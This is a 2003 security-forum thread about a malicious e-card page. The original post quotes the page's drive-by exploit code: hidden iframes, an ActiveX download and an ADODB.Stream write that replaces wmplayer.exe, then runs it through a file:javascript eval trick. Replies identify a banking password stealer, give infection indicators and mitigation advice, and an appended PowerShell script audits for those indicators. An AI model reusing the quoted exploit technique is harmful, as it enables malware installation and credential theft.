stream downloads mplayer

Discussion in 'adware, spyware & hijack cleaning' started by netk, Dec 13, 2003.

Thread Status:
Not open for further replies.
  1. netk

    netk Registered Member

    Joined:
    Dec 13, 2003
    Posts:
    1
    This came in my email .................

    From 123greetings.com

    which is really this

    <iframe src="spy.htm" height="0" width="0">f</iframe>
    <iframe src="start.html" height="0" width="0">f</iframe>
    <object data="1.php"></object>
    <textarea id="code" style="display:none;">
    var x = new ActiveXObject("Microsoft.XMLHTTP");
    x.Open("GET", "downloadlink to an executable called tr.exe",0);
    x.Send();
    var s = new ActiveXObject("ADODB.Stream");
    s.Mode = 3;
    s.Type = 1;
    s.Open();
    s.Write(x.responseBody);
    s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
    location.href = "mms://";
    </textarea>
    <script language="javascript">
    function preparecode(code) {
    result = '';
    lines = code.split(/\r\n/);
    for (i=0;i<lines.length;i++) {
    line = lines[i];
    line = line.replace(/^\s+/,"");
    line = line.replace(/\s+$/,"");
    line = line.replace(/'/g,"\\'");
    line = line.replace(/[\\]/g,"\\\\");
    line = line.replace(/[/]/g,"%2f");
    if (line != '') {
    result += line +'\\r\\n';
    }
    }
    return result;
    }
    function doit() {
    mycode = preparecode(document.all.code.value);
    myURL = "file:javascript:eval('" + mycode + "')";
    window.open(myURL,"_media")
    }
    window.open("error.jsp","_media");
    setTimeout("doit()", 5000);
    </script>
    So this is an example of server script becoming client script.

    Which is great for web services and e-commerce but NOT for assholes that want to trash my system.

    Can someone explain the bug in mplayer.exe that is being exploited? Is it a recompile with a wrapper?




    What you gonna do, or am I going to Linux.
     
  2. Pieter_Arntz

    Pieter_Arntz Spyware Veteran

    Joined:
    Apr 27, 2002
    Posts:
    13,331
    Location:
    Netherlands
    Hi netk,

    I will remove some of the links out of your post, because we don't want anyone else to get in any problems.

    You don't need to switch to Linux to avoid this.
    Don't allow ActiveX outside your trusted zone and keep Outlook out of your trusted zone.

    Regards,

    Pieter
     
  3. Gavin - DiamondCS

    Gavin - DiamondCS Former DCS Moderator

    Joined:
    Feb 10, 2002
    Posts:
    2,080
    Location:
    Perth, Western Australia
    Hi,

    This is a password stealer which monitors keystrokes in certain BANK ACCOUNT WEBPAGES. Very nasty. I would advise that if you use EGold, or any online banking services, that you check your accounts very carefully, and then change your passwords if you have been infected.

    Ensure you were never infected with this first... it adds a RUN key here

    HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

    "thememan"

    And the file goes to Windows\System (or system32) thememan.exe
    This is a sure sign of infection
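    The following is an added example, not code from the thread or from any of its posters. It turns Pieter's advice (do not let the Internet zone run ActiveX) and Gavin's indicators (a "thememan" value under the HKCU Run key, and thememan.exe in Windows\System or System32) into a read-only PowerShell check. The Internet Explorer zone registry layout it reads (zone 3 = Internet, value 1200 = "Run ActiveX controls and plug-ins", 0 = enable, 1 = prompt, 3 = disable) is assumed to be the standard one; the function name Test-ThememanIndicators is this example's own.

```powershell
# Added example, not part of the original thread. Read-only audit: it reports
# the Internet zone ActiveX setting and the "thememan" indicators from the
# thread; it does not remove anything.
function Test-ThememanIndicators {
    # Assumed standard IE zone layout: zone 3 = Internet, value 1200 =
    # "Run ActiveX controls and plug-ins" (0 = enable, 1 = prompt, 3 = disable).
    $zonePath = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3'
    $activeX  = (Get-ItemProperty -Path $zonePath -ErrorAction SilentlyContinue).'1200'
    $activeXState = switch ($activeX) {
        0       { 'enabled (runs ActiveX without prompting)' }
        1       { 'prompt' }
        3       { 'disabled' }
        default { 'unknown (value 1200 not readable)' }
    }

    # Run key value named "thememan", as described in the thread.
    $runKey   = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run'
    $runEntry = Get-ItemProperty -Path $runKey -Name 'thememan' -ErrorAction SilentlyContinue
    $runValue = if ($runEntry) { $runEntry.thememan } else { $null }

    # thememan.exe in Windows\System or System32, as described in the thread.
    $candidates = @(
        (Join-Path $env:windir 'System\thememan.exe'),
        (Join-Path $env:windir 'System32\thememan.exe')
    )
    $files = foreach ($path in $candidates) {
        if (Test-Path -Path $path) {
            $item = Get-Item -Path $path
            [pscustomobject]@{
                Path          = $path
                SizeBytes     = $item.Length
                LastWriteTime = $item.LastWriteTime
            }
        }
    }

    [pscustomobject]@{
        InternetZoneActiveX = $activeXState
        ThememanRunValue    = $runValue
        ThememanFiles       = @($files)
        LikelyInfected      = [bool]($runValue -or $files)
    }
}

# Usage: print the findings and warn on the "sure sign" Gavin describes.
$result = Test-ThememanIndicators
$result | Format-List
if ($result.LikelyInfected) {
    Write-Warning 'thememan Run key and/or thememan.exe present: treat as infected and change banking passwords from a clean machine.'
}
if ($result.InternetZoneActiveX -like 'enabled*') {
    Write-Warning 'Internet zone runs ActiveX controls without prompting; set it to prompt or disable.'
}
```

    The check reads only HKCU, because that is the hive the thread names; a system-wide audit would repeat the Run-key lookup under HKLM. Zone settings can also be overridden by policy, so a value missing from HKCU does not by itself mean ActiveX is disabled.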
     